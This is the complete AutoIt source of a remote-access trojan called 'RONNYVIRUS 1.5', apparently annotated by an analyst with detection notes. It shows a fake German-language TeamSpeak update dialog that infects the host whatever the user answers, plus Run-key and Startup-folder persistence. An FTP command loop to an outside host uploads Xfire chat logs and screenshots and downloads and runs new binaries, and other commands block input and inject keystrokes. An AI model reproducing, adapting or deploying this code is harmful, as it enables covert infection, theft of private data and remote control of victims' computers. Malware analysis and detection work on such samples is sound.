- ;////////////////////////////////////////////
- ;RONNYVIRUS VERSION 1.5 by Daxter and nikeyY'
- ;///////////////////////////////////////////
- ;NEW IN 1.5: Xfire chat-log stealer
- ;////////////////////////////////
- #include <ScreenCapture.au3>
- #include <Zip.au3>
- ;Startup dispatch. Hides the tray icon, resolves the Xfire install directory from the
- ;registry and then decides which role this copy plays:
- ;  * command line contains "update"            -> update() (replace the installed copy)
- ;  * running as <Xfire dir>\xfire_updater.exe  -> get()    (command polling loop)
- ;  * anything else falls through to the fake TeamSpeak update dialog further down.
- ;Analyst note: with the tray icon hidden the compiled script has no visible UI of its own.
- AutoItSetOption("TrayIconHide", 1)
- ;Read the Xfire install path (Wow6432Node key first, plain HKLM\SOFTWARE key as fallback)
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- ;Check whether the process was started as the updater (case-sensitive search for "update" in the raw command line)
- If NOT StringInStr($CmdLineRaw,"update",1) = 0 Then
- update()
- Exit
- EndIf
- ;Check whether the host is already infected, i.e. this is the installed copy inside the Xfire folder
- If @ScriptFullPath = $xfire&"\xfire_updater.exe" Then
- get()
- Exit
- EndIf
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Start of the fake TeamSpeak update
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Social-engineering front end: shows German-language dialogs that imitate a
- ;"TeamSpeak RC2" security update. Analyst note: every path through this block ends in
- ;infect() - TeamSpeak not found, the user answering "No", or the fake install finishing -
- ;so the confirmation dialog has no influence on whether the host gets infected.
- If ProcessExists("TeamSpeak.exe") Then
- MsgBox(16,"Fehler!","Teamspeak sollte während der Installation nicht laufen und wird nun geschlossen.")
- ProcessClose("TeamSpeak.exe")
- EndIf
- ;Read the TeamSpeak path from the registered DefaultIcon value
- $teamspeak = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\teamspeak\DefaultIcon","")
- if @error Then
- MsgBox (16, "TeamSpeak RC2 Update", "TeamSpeak2 wurde nicht erkannt. Stellen Sie sicher, dass TeamSpeak2 installiert ist!")
- infect()
- Exit
- endif
- ;Yes/No question dialog (flag 36); a return value of 6 means "Yes"
- $msg = MsgBox (36, "TeamSpeak RC2 Update", "Wollen Sie Das Update installieren? ")
- ;Progress bar of the fake installation (timed loops only, nothing is installed here)
- if $msg = 6 Then
- ProgressOn("TeamSpeak RC2 Sicherheits-Update", "Update wird installiert . . .", "0 Prozent")
- For $i = 10 to 43 step 1
- sleep(50)
- ProgressSet( $i, $i & " Prozent")
- Next
- For $i = 44 to 80 step 1
- sleep(100)
- ProgressSet( $i, $i & " Prozent")
- Next
- For $i = 81 to 100 step 1
- sleep(30)
- ProgressSet( $i, $i & " Prozent")
- Next
- ProgressSet(100 , "Fertig!", "Update durchgeführt")
- sleep(500)
- ProgressOff()
- else
- infect()
- Exit
- endif
- ;Offer to start TeamSpeak again so the "update" looks finished, then infect regardless of the answer
- $msg2 = MsgBox (324, "TeamSpeak RC2 Update", "Das Update wurde erfolgreich ausgeführt. Wollen Sie TeamSpeak2 nun starten?")
- if $msg2 = 6 Then
- Run($teamspeak)
- endif
- infect()
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;End of the fake TeamSpeak update
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;;;;;;;;;
- ;Infection of the computer
- ;;;;;;;;;;;;;;;;;;;;;;;;
- ;infect(): first-run installer. Takes no parameters and never returns (ends in Exit).
- ;Steps visible below:
- ;  1. creates the staging directory C:\Intel\Logs
- ;  2. uploads an initial per-host command file (<COMPUTERNAME>.ini, one entry "sleep=5")
- ;     to the FTP host through a hidden ftp.exe driven by a script file
- ;  3. copies itself to <Xfire dir>\xfire_updater.exe
- ;  4. sets persistence: HKLM Run value "Xfire Update", or a Startup-folder shortcut
- ;     "Xfire Updater" when the registry write fails
- ;  5. launches the installed copy
- ;Detection notes: ftp.exe started with "-s:" pointing into C:\Intel; files named
- ;AnalysisLog.txt / log.ini created and deleted in C:\Intel; a new Run value pointing at an
- ;executable in the Xfire folder; outbound FTP to the host named in the ShellExecute call.
- Func infect()
- if DirGetSize("C:\Intel\Logs") = -1 Then
- DirCreate("C:\Intel\Logs")
- EndIf
- FileDelete("C:\Intel\log.ini")
- FileDelete("C:\Intel\AnalysisLog.txt")
- ;Create and transfer an .ini file
- IniWrite("C:\Intel\log.ini","settings","sleep","5")
- ;Build the ftp.exe script: the first two lines answer the login prompts (user name and
- ;password, stored in clear text), then transfer mode, the upload and disconnect
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ;Terminates any ftp.exe that is already running before starting its own hidden instance
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
- ProcessWaitClose("ftp.exe")
- ;Remove the script and the ini so no credentials remain on disk after the transfer
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- ;Terminate earlier versions
- ProcessClose("xfire_updater.exe")
- ProcessWaitClose("xfire_updater.exe")
- ;Copy into the Xfire folder (flag 9 = overwrite + create the destination directory)
- FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
- ;Set the registry entry for autostart
- $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
- ;Fallback persistence when the registry write did not succeed: Startup-folder shortcut
- If NOT $var = 1 Then
- FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
- EndIf
- ;Run the copied file
- ShellExecute($xfire&"\xfire_updater.exe")
- Exit
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;End of the infection function
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;Command polling and execution
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;get(): command-and-control loop of the installed copy. Takes no parameters; it only ends
- ;through Exit (commands "exit" and "update") or by calling itself again after a failed fetch.
- ;Each round downloads /<COMPUTERNAME>.ini from the FTP host via a hidden ftp.exe, reads its
- ;[settings] section and runs the entries in order. Keys handled below: sleep, link, media,
- ;msg, cd, chatlog, close, exit, screen, shutdown, selfkill, scroll, pause, update.
- ;Analyst notes: the values come straight from the server-side file and are passed to
- ;Run / ShellExecute / ProcessClose / Shutdown without any checks, so whoever controls that
- ;FTP account controls the host. "chatlog" and "screen" exfiltrate data; "update" downloads
- ;and executes a new binary. All traffic is plain FTP with clear-text credentials.
- Func get()
- ;Version of this build (compared against the value of the "update" command)
- $ver = "1.5"
- ;Determine the operating system ($os is assigned but not read again inside this function)
- if @OSVersion = "WIN_XP" Then
- $os = "xp"
- Else
- $os = "vista"
- EndIf
- ;Read the Firefox path
- $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox","CurrentVersion")
- if @error then
- $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox","CurrentVersion")
- endif
- $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
- if @error then
- $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
- endif
- ;Read the Xfire path
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- ;Make sure the staging directory exists
- if DirGetSize("C:\Intel\Logs") = -1 Then
- DirCreate("C:\Intel\Logs")
- EndIf
- ;Close a possibly running updater process (closes "updater.exe", waits on "update.exe" - names as written)
- ProcessClose("updater.exe")
- ProcessWaitClose("update.exe")
- ;Delete the updater
- If FileExists("C:\Intel\update.exe") Then
- FileDelete("C:\Intel\update.exe")
- EndIf
- While 1
- ;Fetch the command list from the web space
- $settings = 0
- ;ftp.exe script: login name, password, transfer mode, download of this host's ini, disconnect
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "get /"&@computername&".ini C:\Intel\log.ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- ;Store the command list in a two-dimensional array ([n][0] = key, [n][1] = value, [0][0] = count)
- $settings = IniReadSection("C:\Intel\log.ini","settings")
- FileDelete("C:\Intel\log.ini")
- ;Check whether the fetch succeeded; on failure the function calls itself to start over
- If NOT IsArray($settings) Then
- get()
- Exit
- EndIf
- $x = 1
- ;Execute the commands
- While $x < ($settings[0][0] + 1)
- ;Sleep command: value is the delay in seconds
- If $settings[$x][0] = "sleep" Then
- Sleep((Number($settings[$x][1]))*1000)
- EndIf
- ;Link command: opens the server-supplied value in a new Firefox tab and brings the window to the front
- If $settings[$x][0] = "link" Then
- AutoItSetOption("WinTitleMatchMode",2)
- Run($firefox&" -new-tab "&$settings[$x][1])
- ProcessWait("firefox.exe")
- WinActivate("Mozilla Firefox")
- WinWaitActive("Mozilla Firefox")
- EndIf
- ;Media player function: restarts Windows Media Player hidden with the server-supplied file name
- If $settings[$x][0] = "media" Then
- ProcessClose("wmplayer.exe")
- ProcessWaitClose("wmplayer.exe")
- ShellExecute("wmplayer",'/Filename "'&$settings[$x][1]&'"',"","open",@SW_Hide)
- EndIf
- ;MsgBox function: shows the server-supplied text in an information dialog
- If $settings[$x][0] = "msg" Then
- MsgBox(64,"",$settings[$x][1])
- EndIf
- ;CD drive function: applies the server-supplied tray state to drives E: through H:
- If $settings[$x][0] = "cd" Then
- CDTray("E:", $settings[$x][1])
- CDTray("F:", $settings[$x][1])
- CDTray("G:", $settings[$x][1])
- CDTray("H:", $settings[$x][1])
- EndIf
- ;Xfire chat-log upload function (data theft): zips %APPDATA%\Xfire\chatlog and uploads it
- ;as /chatlogs/<COMPUTERNAME>_xfire.zip, then deletes the local archive and ftp script
- If $settings[$x][0] = "chatlog" and $settings[$x][1] = "xfire" Then
- FileDelete("C:\Intel\Logs\log.zip")
- _Zip_Create("C:\Intel\Logs\log.zip")
- _Zip_AddFolderContents("C:\Intel\Logs\log.zip", @AppDataDir & "\Xfire\chatlog")
- sleep(3000)
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
- FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.zip /chatlogs/"&@ComputerName&"_xfire.zip")
- FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\Logs\Log.txt")
- FileDelete("C:\Intel\Logs\log.zip")
- EndIf
- ;Process termination function: closes the process named by the server
- If $settings[$x][0] = "close" Then
- ProcessClose($settings[$x][1])
- EndIf
- ;Function that ends the polling (the script exits; persistence entries are left in place)
- If $settings[$x][0] = "exit" Then
- Exit
- EndIf
- ;Screenshot function (data theft): captures the screen as JPG at the server-supplied quality
- ;and uploads it to /screenshots/<COMPUTERNAME>/<day>.<month>-<hour>.<min>.<sec>.jpg
- If $settings[$x][0] = "screen" Then
- _ScreenCapture_SetJPGQuality(Number($settings[$x][1]))
- _ScreenCapture_Capture("C:\Intel\Logs\log.jpg")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
- FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.jpg /screenshots/"&@ComputerName&"/"&@MDAY&"."&@MON&"-"&@HOUR&"."&@MIN&"."&@SEC&".jpg")
- FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\Logs\Log.txt")
- FileDelete("C:\Intel\Logs\log.jpg")
- EndIf
- ;Shutdown function: passes the server-supplied code to Shutdown()
- If $settings[$x][0] = "shutdown" Then
- Shutdown($settings[$x][1])
- EndIf
- ;Selfkill function (CoD2): blocks user input, then injects key releases, mouse movement
- ;and keystrokes - presumably aimed at a running Call of Duty 2 session, per the original comment
- If $settings[$x][0] = "selfkill" Then
- BlockInput(1)
- Send("{a up}")
- Send("{w up}")
- Send("{s up}")
- Send("{d up}")
- MouseMove(mousegetpos(0)+50, mousegetpos(1)+2000, 1)
- sleep (50)
- Send("^/+frag/-frag")
- sleep (50)
- MouseMove(mousegetpos(0)+50, mousegetpos(1)+1000, 80)
- Sleep(200)
- Send("tI AM GAY!"& @CRLF)
- sleep(1000)
- BlockInput(0)
- EndIf
- ;Scroll function: blocks user input and scrolls the mouse wheel down (value * 10) steps
- If $settings[$x][0] = "scroll" Then
- BlockInput(1)
- $y = ($settings[$x][1]*10)
- While $y>0
- MouseWheel("down", 1)
- Sleep(100)
- $y = $y - 1
- WEnd
- BlockInput(0)
- EndIf
- ;Pause function: uploads a fresh ini holding only "sleep=5" over this host's command file
- ;on the server (unlike the other transfers, no running ftp.exe is closed first)
- If $settings[$x][0] = "pause" Then
- IniWrite("C:\Intel\log.ini","settings","sleep","5")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- EndIf
- ;Update function (download and run the new .exe from the web space); only taken when the
- ;server-supplied version differs from $ver. The downloaded file is started with the
- ;argument "update", and this copy exits afterwards.
- If $settings[$x][0] = "update" AND $settings[$x][1] <> $ver Then
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "binary")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "get /update/update.exe C:\Intel\update.exe")
- FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
- ProcessClose("ftp.exe")
- ProcessWaitClose("ftp.exe")
- ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
- ProcessWaitClose("ftp.exe")
- FileDelete("C:\Intel\AnalysisLog.txt")
- FileDelete("C:\Intel\log.ini")
- If FileExists("C:\Intel\update.exe") Then
- ShellExecute("C:\Intel\update.exe","update")
- ProcessWait("update.exe")
- EndIf
- Exit
- EndIf
- $x = $x + 1
- WEnd
- ;End of command execution, fetch the command list again
- WEnd
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;End of the polling and execution function
- ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
- ;;;;;;;;;;;;;;;;
- ;Update function
- ;;;;;;;;;;;;;;;;
- ;update(): self-replacement routine, entered from the startup dispatch when "update" is on
- ;the command line. Takes no parameters and never returns (ends in Exit).
- ;It stops the installed copy, deletes <Xfire dir>\xfire_updater.exe (calling itself again
- ;while the file still exists), copies the running binary into that path, re-applies the
- ;same persistence as infect() and starts the new copy.
- ;Detection notes: an executable in C:\Intel that overwrites a file in the Xfire folder and
- ;rewrites the HKLM Run value "Xfire Update" matches this routine.
- Func update()
- ;Read the Xfire path
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
- If @error Then
- $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
- EndIf
- ;Close the old process
- ProcessClose("xfire_updater.exe")
- ProcessWaitClose("xfire_updater.exe")
- ;Delete the old .exe; if it is still present afterwards, start this routine over
- If FileExists($xfire&"\xfire_updater.exe") Then
- FileDelete($xfire&"\xfire_updater.exe")
- If FileExists($xfire&"\xfire_updater.exe") Then
- update()
- Exit
- EndIf
- EndIf
- ;Infect with the new .exe (flag 9 = overwrite + create the destination directory)
- FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
- ;;Set the registry entry for autostart
- $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
- ;Fallback persistence when the registry write did not succeed: Startup-folder shortcut
- If NOT $var = 1 Then
- FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
- EndIf
- ;Start the new .exe
- ShellExecute($xfire&"\xfire_updater.exe")
- Exit
- EndFunc
- ;;;;;;;;;;;;;;;;;;;;;;;;;
- ;End of the update function
- ;;;;;;;;;;;;;;;;;;;;;;;;;